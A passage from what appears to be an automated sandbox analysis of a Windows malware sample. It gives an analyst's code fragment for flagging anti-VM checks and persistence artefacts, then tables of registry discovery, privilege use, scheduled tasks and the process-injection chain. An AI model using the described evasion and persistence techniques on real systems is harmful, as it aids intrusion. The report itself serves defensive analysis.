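    print("anti-VM flagged:", flag_anti_vm(evs))
    for mech, artefact, proc in persistence_inventory(evs):
        print(f"{mech:20} {artefact}  <- {proc}")
```

Scoring per process rather than per run is the point: in this report the browsers (chrome.exe, msedge.exe) also read BIOS keys, but only the sample's own executables read the VBOX__ table, the BIOS version strings and Software\Wine together, and the Win7 run (behavioral1) shows the original sample performing exactly those reads with no dropped executables following them. The decoded Run-key values give the two logon paths (am_no.cmd and Anubis.exe) to check on any host that ran the sample, alongside win_update.vbs in the Startup folder and the three .job files.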

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108900101\4c885c7af1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108920101\b7b3518f4b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108920101\b7b3518f4b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108930101\01b3af3054.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108880101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempDOCRR6GVSRO5TP7833AJ47MPPWB8SWEE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108810101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\bxagwdt\nharnrr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108910101\25225dec3b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108940101\afe4448849.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108860101\v6Oqdnc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133856982989643006" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDOCRR6GVSRO5TP7833AJ47MPPWB8SWEE.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDOCRR6GVSRO5TP7833AJ47MPPWB8SWEE.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\bxagwdt\nharnrr.exe N/A
N/A N/A C:\ProgramData\bxagwdt\nharnrr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108860101\v6Oqdnc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10108920101\b7b3518f4b.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2760 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe
PID 2760 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe
PID 2760 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe
PID 1192 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1192 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1192 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1088 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 1088 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 1088 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 3960 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 3960 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 3960 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1088 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe
PID 1088 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe
PID 1088 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe
PID 3280 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe C:\Windows\SysWOW64\cmd.exe
PID 3280 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe C:\Windows\SysWOW64\cmd.exe
PID 3280 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe C:\Windows\SysWOW64\cmd.exe
PID 3280 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe C:\Windows\SysWOW64\mshta.exe
PID 3280 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe C:\Windows\SysWOW64\mshta.exe
PID 3280 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe C:\Windows\SysWOW64\mshta.exe
PID 3680 wrote to memory of 2964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3680 wrote to memory of 2964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3680 wrote to memory of 2964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 5040 wrote to memory of 4692 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5040 wrote to memory of 4692 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5040 wrote to memory of 4692 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5048 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 5048 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
